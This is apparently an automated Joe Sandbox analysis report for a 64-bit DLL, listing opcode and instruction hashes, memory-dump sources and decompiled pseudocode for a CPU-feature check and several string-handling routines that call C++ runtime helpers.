                                                                                                        • Instruction ID: 79354f79ef65217a83ad5669e5e5daff520c5b483ab2cf90db9683dfdc12feb2
                                                                                                        • Opcode Fuzzy Hash: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
                                                                                                        • Instruction Fuzzy Hash: A331C5B190434A8BDB48DF24C88A5DE7FF0FB58388F10461CE85AA7250D3B4D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
                                                                                                        • Instruction ID: f7e907a5a4d268517ac5d39fb781b2abcac55db7633d781cedf7f9941ca353e5
                                                                                                        • Opcode Fuzzy Hash: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
                                                                                                        • Instruction Fuzzy Hash: 8F21A0B152C781AFD388DF28C19981ABBE1FB88304F806A1DF98687350D374D844CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
                                                                                                        • Instruction ID: e563aa27f56e2ecce816434c0e114442c931e28e35474e2e86562d3eaff730a2
                                                                                                        • Opcode Fuzzy Hash: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
                                                                                                        • Instruction Fuzzy Hash: 8931707552D784AFC788DF28D48991EBBF0FB98345F906A1DF88686264E374D445CB02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
                                                                                                        • Instruction ID: cfe9eacf390d468c13f16f556d0757c07c704974f4e6988c0e8e4883957bcd26
                                                                                                        • Opcode Fuzzy Hash: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
                                                                                                        • Instruction Fuzzy Hash: 95316174529380AFD398DF28D48A81BBBF0FB99314F806E1DF9C68A2A0D774D405CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
                                                                                                        • Instruction ID: 95bb47a97fe7a9d8d529fae77a119aa2dd9a35a31096ffbc611f9293c9fe5b2f
                                                                                                        • Opcode Fuzzy Hash: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
                                                                                                        • Instruction Fuzzy Hash: 2531F17080438E8BDB48CF64C8865DFBFB0FB48358F104A19EC5AA6250D7B89664CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
                                                                                                        • Instruction ID: aca377b28207093ad69189230e20808a2953a665cdfbd0516b7c3ce528793aa5
                                                                                                        • Opcode Fuzzy Hash: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
                                                                                                        • Instruction Fuzzy Hash: 7F2168B15187808BD348DF28D54951ABBE1BB8C30CF400B2DF8CAAA2A1D778D604CF4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 86%
                                                                                                        			E00007FFC7FFC123DAB50(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                        				intOrPtr _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				_t25 = __r8;
                                                                                                        				r8d = 0;
                                                                                                        				 *0x1244f4f8 = r8d;
                                                                                                        				_t1 = _t25 + 1; // 0x1
                                                                                                        				r9d = _t1;
                                                                                                        				asm("cpuid");
                                                                                                        				_v16 = r9d;
                                                                                                        				_v16 = 0;
                                                                                                        				_v20 = __ebx;
                                                                                                        				_v12 = __edx;
                                                                                                        				if (0 != 0x18001000) goto 0x123dabb1;
                                                                                                        				asm("xgetbv");
                                                                                                        				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                        				r8d =  *0x1244f4f8; // 0x1
                                                                                                        				r8d =  ==  ? r9d : r8d;
                                                                                                        				 *0x1244f4f8 = r8d;
                                                                                                        				 *0x1244f4fc = r8d;
                                                                                                        				return 0;
                                                                                                        			}







                                                                                                        0x7ffc123dab50
                                                                                                        0x7ffc123dab56
                                                                                                        0x7ffc123dab5b
                                                                                                        0x7ffc123dab62
                                                                                                        0x7ffc123dab62
                                                                                                        0x7ffc123dab69
                                                                                                        0x7ffc123dab6b
                                                                                                        0x7ffc123dab73
                                                                                                        0x7ffc123dab79
                                                                                                        0x7ffc123dab7d
                                                                                                        0x7ffc123dab83
                                                                                                        0x7ffc123dab87
                                                                                                        0x7ffc123dab91
                                                                                                        0x7ffc123dab9b
                                                                                                        0x7ffc123daba6
                                                                                                        0x7ffc123dabaa
                                                                                                        0x7ffc123dabb1
                                                                                                        0x7ffc123dabbf

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
                                                                                                        • Instruction ID: 166a95978e13dfb0cae5ebdb6007fc9eb900932a45a3212aead2b85bc57454b5
                                                                                                        • Opcode Fuzzy Hash: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
                                                                                                        • Instruction Fuzzy Hash: BEF0C8757186AA8BDB948F28A442A6937D0F718390FE08079D69C87B04CA7C9071CF24
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC123D3240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				long long _v112;
                                                                                                        				long long _v120;
                                                                                                        				long long _v128;
                                                                                                        				long long _v136;
                                                                                                        				long long _t207;
                                                                                                        				intOrPtr* _t209;
                                                                                                        				intOrPtr _t218;
                                                                                                        				intOrPtr _t221;
                                                                                                        				long long _t223;
                                                                                                        				void* _t225;
                                                                                                        				intOrPtr _t228;
                                                                                                        				long long _t229;
                                                                                                        				void* _t230;
                                                                                                        				intOrPtr _t235;
                                                                                                        				long long _t237;
                                                                                                        				void* _t239;
                                                                                                        				void* _t243;
                                                                                                        				long long _t245;
                                                                                                        				void* _t247;
                                                                                                        				long long _t248;
                                                                                                        				void* _t249;
                                                                                                        				long long _t250;
                                                                                                        				void* _t251;
                                                                                                        				long long _t257;
                                                                                                        
                                                                                                        				_t207 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D21F0(__eflags, __rax, _a8, _a16);
                                                                                                        				E00007FFC7FFC123D21F0(__eflags, __rax, _a32, _a40);
                                                                                                        				E00007FFC7FFC123D2400(__eflags, __rax, _a8, _a16, _a24);
                                                                                                        				_a24 = _t207;
                                                                                                        				E00007FFC7FFC123D2400(__eflags, _t207, _a32, _a40, _a48);
                                                                                                        				_a48 = _t207;
                                                                                                        				_t209 = 0xffffffff - _a48;
                                                                                                        				_v120 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170(_t209, _a8);
                                                                                                        				_t211 =  *_t209 - _a24;
                                                                                                        				if (_v120 - 0xffffffff > 0) goto 0x123d3315;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170( *_t209 - _a24, _a8);
                                                                                                        				_v136 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170( *_t211 - _a24 - _a16, _a8);
                                                                                                        				_v128 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
                                                                                                        				if ( *0xffffffff - _v128 >= 0) goto 0x123d338e;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D22B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
                                                                                                        				_t218 = _a24;
                                                                                                        				if (_a48 != _t218) goto 0x123d33ec;
                                                                                                        				E00007FFC7FFC123D18D0(_t218, _a32);
                                                                                                        				_v112 = _t218 + _a40;
                                                                                                        				E00007FFC7FFC123D18F0(_t218 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t218 + _a40 + _a16, _v112, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t221 = _a32;
                                                                                                        				if (_a8 == _t221) goto 0x123d34a2;
                                                                                                        				E00007FFC7FFC123D18F0(_t221, _a8);
                                                                                                        				_t223 = _t221 + _a16 + _a24;
                                                                                                        				_v104 = _t223;
                                                                                                        				E00007FFC7FFC123D18F0(_t223, _a8);
                                                                                                        				_t225 = _t223 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC123D1230(_t225, _v104, _v136);
                                                                                                        				E00007FFC7FFC123D18D0(_t225, _a32);
                                                                                                        				_v96 = _t225 + _a40;
                                                                                                        				E00007FFC7FFC123D18F0(_t225 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t225 + _a40 + _a16, _v96, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t228 = _a24;
                                                                                                        				if (_a48 - _t228 >= 0) goto 0x123d3558;
                                                                                                        				E00007FFC7FFC123D18F0(_t228, _a8);
                                                                                                        				_t229 = _t228 + _a40;
                                                                                                        				_v88 = _t229;
                                                                                                        				E00007FFC7FFC123D18F0(_t229, _a8);
                                                                                                        				_t230 = _t229 + _a16;
                                                                                                        				E00007FFC7FFC123D1230(_t230, _v88, _a48);
                                                                                                        				E00007FFC7FFC123D18F0(_t230, _a8);
                                                                                                        				_v80 = _t230 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC123D18F0(_t230 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t235 = _a16;
                                                                                                        				if (_a40 - _t235 > 0) goto 0x123d360e;
                                                                                                        				E00007FFC7FFC123D18F0(_t235, _a8);
                                                                                                        				_t237 = _t235 + _a16 + _a24;
                                                                                                        				_v72 = _t237;
                                                                                                        				E00007FFC7FFC123D18F0(_t237, _a8);
                                                                                                        				_t239 = _t237 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC123D1230(_t239, _v72, _v136);
                                                                                                        				E00007FFC7FFC123D18F0(_t239, _a8);
                                                                                                        				_v64 = _t239 + _a40;
                                                                                                        				E00007FFC7FFC123D18F0(_t239 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t239 + _a40 + _a16, _v64, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t243 = _a16 + _a24;
                                                                                                        				if (_t243 - _a40 > 0) goto 0x123d36eb;
                                                                                                        				E00007FFC7FFC123D18F0(_t243, _a8);
                                                                                                        				_t245 = _t243 + _a16 + _a24;
                                                                                                        				_v56 = _t245;
                                                                                                        				E00007FFC7FFC123D18F0(_t245, _a8);
                                                                                                        				_t247 = _t245 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC123D1230(_t247, _v56, _v136);
                                                                                                        				E00007FFC7FFC123D18F0(_t247, _a8);
                                                                                                        				_t248 = _t247 + _a40 + _a48 - _a24;
                                                                                                        				_v48 = _t248;
                                                                                                        				E00007FFC7FFC123D18F0(_t248, _a8);
                                                                                                        				_t249 = _t248 + _a16;
                                                                                                        				E00007FFC7FFC123D1230(_t249, _v48, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				E00007FFC7FFC123D18F0(_t249, _a8);
                                                                                                        				_t250 = _t249 + _a40;
                                                                                                        				_v40 = _t250;
                                                                                                        				E00007FFC7FFC123D18F0(_t250, _a8);
                                                                                                        				_t251 = _t250 + _a16;
                                                                                                        				E00007FFC7FFC123D1230(_t251, _v40, _a24);
                                                                                                        				E00007FFC7FFC123D18F0(_t251, _a8);
                                                                                                        				_v32 = _t251 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC123D18F0(_t251 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
                                                                                                        				_t257 = _a48 - _a24;
                                                                                                        				_v24 = _t257;
                                                                                                        				E00007FFC7FFC123D18F0(_t257, _a8);
                                                                                                        				_t259 = _t257 + _a40 + _a48;
                                                                                                        				_v16 = _t257 + _a40 + _a48;
                                                                                                        				E00007FFC7FFC123D18F0(_t257 + _a40 + _a48, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t259 + _a16 + _a24, _v16, _v24);
                                                                                                        				return E00007FFC7FFC123D23A0(_t259 + _a16 + _a24, _a8, _v128);
                                                                                                        			}







































                                                                                                        0x7ffc123d3240
                                                                                                        0x7ffc123d3240
                                                                                                        0x7ffc123d3245
                                                                                                        0x7ffc123d324a
                                                                                                        0x7ffc123d324f
                                                                                                        0x7ffc123d326b
                                                                                                        0x7ffc123d3280
                                                                                                        0x7ffc123d329d
                                                                                                        0x7ffc123d32a2
                                                                                                        0x7ffc123d32c2
                                                                                                        0x7ffc123d32c7
                                                                                                        0x7ffc123d32d6
                                                                                                        0x7ffc123d32de
                                                                                                        0x7ffc123d32eb
                                                                                                        0x7ffc123d32fb
                                                                                                        0x7ffc123d3306
                                                                                                        0x7ffc123d3310
                                                                                                        0x7ffc123d331d
                                                                                                        0x7ffc123d3338
                                                                                                        0x7ffc123d3345
                                                                                                        0x7ffc123d335d
                                                                                                        0x7ffc123d336a
                                                                                                        0x7ffc123d3377
                                                                                                        0x7ffc123d3379
                                                                                                        0x7ffc123d3389
                                                                                                        0x7ffc123d338e
                                                                                                        0x7ffc123d339e
                                                                                                        0x7ffc123d33a8
                                                                                                        0x7ffc123d33b5
                                                                                                        0x7ffc123d33c2
                                                                                                        0x7ffc123d33e2
                                                                                                        0x7ffc123d33e7
                                                                                                        0x7ffc123d33ec
                                                                                                        0x7ffc123d33fc
                                                                                                        0x7ffc123d340a
                                                                                                        0x7ffc123d3417
                                                                                                        0x7ffc123d341f
                                                                                                        0x7ffc123d342c
                                                                                                        0x7ffc123d3439
                                                                                                        0x7ffc123d3451
                                                                                                        0x7ffc123d345e
                                                                                                        0x7ffc123d346b
                                                                                                        0x7ffc123d3478
                                                                                                        0x7ffc123d3498
                                                                                                        0x7ffc123d349d
                                                                                                        0x7ffc123d34a2
                                                                                                        0x7ffc123d34b2
                                                                                                        0x7ffc123d34c0
                                                                                                        0x7ffc123d34c5
                                                                                                        0x7ffc123d34cd
                                                                                                        0x7ffc123d34da
                                                                                                        0x7ffc123d34df
                                                                                                        0x7ffc123d34fa
                                                                                                        0x7ffc123d3507
                                                                                                        0x7ffc123d351c
                                                                                                        0x7ffc123d3529
                                                                                                        0x7ffc123d354e
                                                                                                        0x7ffc123d3553
                                                                                                        0x7ffc123d3558
                                                                                                        0x7ffc123d3568
                                                                                                        0x7ffc123d3576
                                                                                                        0x7ffc123d3583
                                                                                                        0x7ffc123d358b
                                                                                                        0x7ffc123d3598
                                                                                                        0x7ffc123d35a5
                                                                                                        0x7ffc123d35bd
                                                                                                        0x7ffc123d35ca
                                                                                                        0x7ffc123d35d7
                                                                                                        0x7ffc123d35e4
                                                                                                        0x7ffc123d3604
                                                                                                        0x7ffc123d3609
                                                                                                        0x7ffc123d3621
                                                                                                        0x7ffc123d362c
                                                                                                        0x7ffc123d363a
                                                                                                        0x7ffc123d3647
                                                                                                        0x7ffc123d364f
                                                                                                        0x7ffc123d365c
                                                                                                        0x7ffc123d3669
                                                                                                        0x7ffc123d3681
                                                                                                        0x7ffc123d368e
                                                                                                        0x7ffc123d36b1
                                                                                                        0x7ffc123d36b4
                                                                                                        0x7ffc123d36c1
                                                                                                        0x7ffc123d36c6
                                                                                                        0x7ffc123d36e1
                                                                                                        0x7ffc123d36e6
                                                                                                        0x7ffc123d36f3
                                                                                                        0x7ffc123d36f8
                                                                                                        0x7ffc123d3700
                                                                                                        0x7ffc123d3710
                                                                                                        0x7ffc123d3715
                                                                                                        0x7ffc123d3733
                                                                                                        0x7ffc123d3740
                                                                                                        0x7ffc123d3755
                                                                                                        0x7ffc123d3765
                                                                                                        0x7ffc123d378d
                                                                                                        0x7ffc123d37a5
                                                                                                        0x7ffc123d37a8
                                                                                                        0x7ffc123d37b8
                                                                                                        0x7ffc123d37c5
                                                                                                        0x7ffc123d37cd
                                                                                                        0x7ffc123d37dd
                                                                                                        0x7ffc123d380b
                                                                                                        0x7ffc123d3831

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1550686663-0
                                                                                                        • Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction ID: ce1341791fc0d2980b75a5f3528714b486b8cee2a0ebc348cbf215014fb34928
                                                                                                        • Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction Fuzzy Hash: 04D1C76AA1DFC981DA70DB91F4913EAB365FBC8794F804026DA8D43B6ADF6CD054CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 48%
                                                                                                        			E00007FFC7FFC123D2FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _t100;
                                                                                                        				intOrPtr* _t102;
                                                                                                        				intOrPtr* _t104;
                                                                                                        				long long _t108;
                                                                                                        				long long _t110;
                                                                                                        				intOrPtr* _t112;
                                                                                                        				intOrPtr _t116;
                                                                                                        				long long _t118;
                                                                                                        
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x123d303c;
                                                                                                        				E00007FFC7FFC123D18F0(__rax, _a8);
                                                                                                        				_t100 = _a32 - __rax;
                                                                                                        				_v64 = _a40;
                                                                                                        				_v72 = _t100;
                                                                                                        				E00007FFC7FFC123D3240(__edx, E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
                                                                                                        				goto 0x123d3214;
                                                                                                        				E00007FFC7FFC123D21F0(E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
                                                                                                        				E00007FFC7FFC123D2400(E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
                                                                                                        				_a24 = _t100;
                                                                                                        				_t102 = 0xffffffff - _a40;
                                                                                                        				_v40 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170(_t102, _a8);
                                                                                                        				_t104 =  *_t102 - _a24;
                                                                                                        				if (_v40 - 0xffffffff > 0) goto 0x123d30aa;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170(_t104, _a8);
                                                                                                        				_v56 =  *_t104 - _a24 - _a16;
                                                                                                        				_t108 = _a24;
                                                                                                        				if (_a40 - _t108 >= 0) goto 0x123d3126;
                                                                                                        				E00007FFC7FFC123D18F0(_t108, _a8);
                                                                                                        				_t110 = _t108 + _a16 + _a24;
                                                                                                        				_v32 = _t110;
                                                                                                        				E00007FFC7FFC123D18F0(_t110, _a8);
                                                                                                        				_t112 = _t110 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC123D1230(_t112, _v32, _v56);
                                                                                                        				E00007FFC7FFC123D2170(_t112, _a8);
                                                                                                        				_v48 =  *_t112 + _a40 - _a24;
                                                                                                        				if (_a40 > 0) goto 0x123d3162;
                                                                                                        				if (_a24 <= 0) goto 0x123d320f;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC123D22B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x123d320f;
                                                                                                        				_t116 = _a40;
                                                                                                        				if (_a24 - _t116 >= 0) goto 0x123d31d9;
                                                                                                        				E00007FFC7FFC123D18F0(_t116, _a8);
                                                                                                        				_t118 = _t116 + _a16 + _a24;
                                                                                                        				_v24 = _t118;
                                                                                                        				E00007FFC7FFC123D18F0(_t118, _a8);
                                                                                                        				_t120 = _t118 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC123D1230(_t118 + _a16 + _a40, _v24, _v56);
                                                                                                        				E00007FFC7FFC123D18F0(_t118 + _a16 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t120 + _a16, _a32, _a40);
                                                                                                        				return E00007FFC7FFC123D23A0(_t120 + _a16, _a8, _v48);
                                                                                                        			}


















                                                                                                        0x7ffc123d2fc0
                                                                                                        0x7ffc123d2fc5
                                                                                                        0x7ffc123d2fca
                                                                                                        0x7ffc123d2fcf
                                                                                                        0x7ffc123d2fef
                                                                                                        0x7ffc123d2ff6
                                                                                                        0x7ffc123d3006
                                                                                                        0x7ffc123d3011
                                                                                                        0x7ffc123d3016
                                                                                                        0x7ffc123d3032
                                                                                                        0x7ffc123d3037
                                                                                                        0x7ffc123d3046
                                                                                                        0x7ffc123d305d
                                                                                                        0x7ffc123d3062
                                                                                                        0x7ffc123d3071
                                                                                                        0x7ffc123d3079
                                                                                                        0x7ffc123d3083
                                                                                                        0x7ffc123d3093
                                                                                                        0x7ffc123d309e
                                                                                                        0x7ffc123d30a5
                                                                                                        0x7ffc123d30af
                                                                                                        0x7ffc123d30c7
                                                                                                        0x7ffc123d30cc
                                                                                                        0x7ffc123d30dc
                                                                                                        0x7ffc123d30e3
                                                                                                        0x7ffc123d30ed
                                                                                                        0x7ffc123d30f5
                                                                                                        0x7ffc123d30ff
                                                                                                        0x7ffc123d3109
                                                                                                        0x7ffc123d3121
                                                                                                        0x7ffc123d312b
                                                                                                        0x7ffc123d3143
                                                                                                        0x7ffc123d3151
                                                                                                        0x7ffc123d315c
                                                                                                        0x7ffc123d3162
                                                                                                        0x7ffc123d3179
                                                                                                        0x7ffc123d317f
                                                                                                        0x7ffc123d318f
                                                                                                        0x7ffc123d3196
                                                                                                        0x7ffc123d31a0
                                                                                                        0x7ffc123d31a8
                                                                                                        0x7ffc123d31b2
                                                                                                        0x7ffc123d31bc
                                                                                                        0x7ffc123d31d4
                                                                                                        0x7ffc123d31de
                                                                                                        0x7ffc123d31fb
                                                                                                        0x7ffc123d3218

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D226B
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D2FF6
                                                                                                          • Part of subcall function 00007FFC123D18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D18FE
                                                                                                          • Part of subcall function 00007FFC123D3240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D3310
                                                                                                          • Part of subcall function 00007FFC123D3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D33A8
                                                                                                          • Part of subcall function 00007FFC123D3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D33C2
                                                                                                          • Part of subcall function 00007FFC123D3240: char_traits.LIBCPMTD ref: 00007FFC123D33E2
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D30A5
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D30E3
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D30FF
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D3121
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D3196
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D31B2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D31D4
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D31DE
